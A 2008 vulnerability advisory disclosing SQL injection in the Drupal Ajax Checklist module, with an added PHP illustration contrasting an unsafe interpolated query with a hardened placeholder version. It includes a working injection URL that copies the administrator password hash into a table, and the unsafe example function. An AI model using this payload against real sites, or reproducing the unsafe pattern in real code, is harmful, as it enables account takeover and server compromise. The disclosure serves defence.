Drupal Ajax Checklist Module SQL Injection Vulnerability

* Discovery Date: Sept 15, 2008
* Security risk: high
* Exploitable from: Remote
* Vulnerability: SQL Injection
* Discovered by: Justin C. Klein Keane

Description

Drupal (http://drupal.org) is a robust content management system (CMS) that provides extensibility through hundreds of third party modules. While the security of Drupal core modules is vetted by a central security team, third party modules are not reviewed for security.

The Ajax Checklist module (http://drupal.org/project/ajax_checklist), created by AsciiKewl (http://drupal.org/user/147292), is designed to allow users to embed dynamic checklists in nodes. These checklists can then be checked or unchecked, with their state tracked via AJAX calls to pages that store it in the database. Due to poor input validation on the AJAX handling pages, this module is vulnerable to SQL injection attacks. Depending on configuration, these attacks could be carried out by remote unauthenticated users. Because of its data-driven design, SQL injection attacks pose a critical threat to Drupal installations and their hosts and could lead to full control over the web server process.

The critical flaw exists within the ajax_checklist_save() function (lines 61-84 of ajax_checklist.module). This function accepts three parameters ($nid, $qid, and $state), all of which can be manipulated via a crafted URL. These parameters are then used to build SQL SELECT, INSERT, and UPDATE statements without first being sanitized.
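The unsafe pattern the advisory describes, shown beside a hardened form, as an added illustration written for this advisory and not the module's actual code. Function names, the column layout of ajax_checklist (nid, user, qid, state) and the way the three values arrive are assumptions taken from the description above; the fix relies on Drupal 5's db_query() placeholder arguments.

```php
<?php
// Illustration added for this advisory; NOT the module's own code.
// Function names, columns and the callback shape are assumptions based on
// the advisory: table ajax_checklist (nid, user, qid, state), values
// $nid, $qid and $state taken from the URL path.

// UNSAFE pattern: URL-derived values are interpolated into the SQL text,
// so whatever the caller puts in the path becomes part of the query. This
// is what lets the advisory's test URL add rows it was never meant to add.
function example_checklist_save_unsafe($nid, $qid, $state) {
  global $user;
  $found = db_result(db_query("SELECT COUNT(*) FROM {ajax_checklist} WHERE nid = $nid AND qid = '$qid' AND user = $user->uid"));
  if ($found) {
    db_query("UPDATE {ajax_checklist} SET state = $state WHERE nid = $nid AND qid = '$qid' AND user = $user->uid");
  }
  else {
    db_query("INSERT INTO {ajax_checklist} (nid, user, qid, state) VALUES ($nid, $user->uid, '$qid', $state)");
  }
}

// HARDENED pattern: validate type and length first, check that the caller
// may act on the node, then hand the values to db_query() as arguments so
// Drupal 5's %d / '%s' placeholders do the casting and quoting.
function example_checklist_save_safe($nid, $qid, $state) {
  global $user;
  // nid and state must be plain non-negative integers; reject anything else.
  if (!ctype_digit((string) $nid) || !ctype_digit((string) $state)) {
    drupal_access_denied();
    return;
  }
  $nid = (int) $nid;
  $state = (int) $state;
  // qid is a free-form identifier: bound its length and let '%s' escape it.
  $qid = substr((string) $qid, 0, 32);
  // Authorization: a caller must not write checklist state for a node it
  // cannot view (the advisory notes anonymous users may reach this path).
  $node = node_load($nid);
  if (!$node || !node_access('view', $node)) {
    drupal_access_denied();
    return;
  }
  $found = db_result(db_query("SELECT COUNT(*) FROM {ajax_checklist} WHERE nid = %d AND qid = '%s' AND user = %d", $nid, $qid, $user->uid));
  if ($found) {
    db_query("UPDATE {ajax_checklist} SET state = %d WHERE nid = %d AND qid = '%s' AND user = %d", $state, $nid, $qid, $user->uid);
  }
  else {
    db_query("INSERT INTO {ajax_checklist} (nid, user, qid, state) VALUES (%d, %d, '%s', %d)", $nid, $user->uid, $qid, $state);
  }
}
```

With the placeholder form, the value that the test URL below smuggles into qid is stored as a literal string rather than executed, and the integer parameters can no longer carry SQL at all.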
Vulnerable Versions

5.x-1.0 dated 2007-Aug-18 was tested and shown vulnerable.

Testing for Vulnerability

Calling the URL:

http://sitename.tld/ajaxchecklist/save/1/2%27,2),(3,3,(select%20pass%20from%20users%20where%20uid=1),3),(4,4,%274/3/4

will cause the administrator password hash to be inserted into the ajax_checklist table in the Drupal database:

mysql> select * from ajax_checklist;
+-----+------+----------------------------------+-------+
| nid | user | qid                              | state |
+-----+------+----------------------------------+-------+
|   1 |    0 | 2                                |     2 |
|   3 |    3 | 4202b5f87a68583e20aae6917c8c33d1 |     3 |
|   4 |    4 | 4                                |     3 |
+-----+------+----------------------------------+-------+

Impact

Highly critical. Depending on configuration, this vulnerability could allow attackers to compromise the Drupal administrator account, an attack that can lead to web server and even host compromise, since the administrator can configure file uploads and alter any content on the Drupal installation.

Determining Version

The ajax_checklist.info file for vulnerable versions contains the following information:

; $Id: ajax_checklist.info,v 1.1 2007/08/16 06:39:34 asciikewl Exp $
name = Ajax Checklist
description = Creates filter-driven checklists with ajax updating to the database
package = Other
version = 5.x-0.1

; Information added by drupal.org packaging script on 2007-08-18
version = "5.x-1.0"
project = "ajax_checklist"
datestamp = "1187416501"

Determining version information on Drupal sites is trivial in many cases (ref http://www.madirish.net/?article=214).

Vendor Response

Drupal security team contacted September 17, 2008. A security patch and announcement should be available Wednesday September 24, 2008.

-- 
Justin C. Klein Keane
http://www.MadIrish.net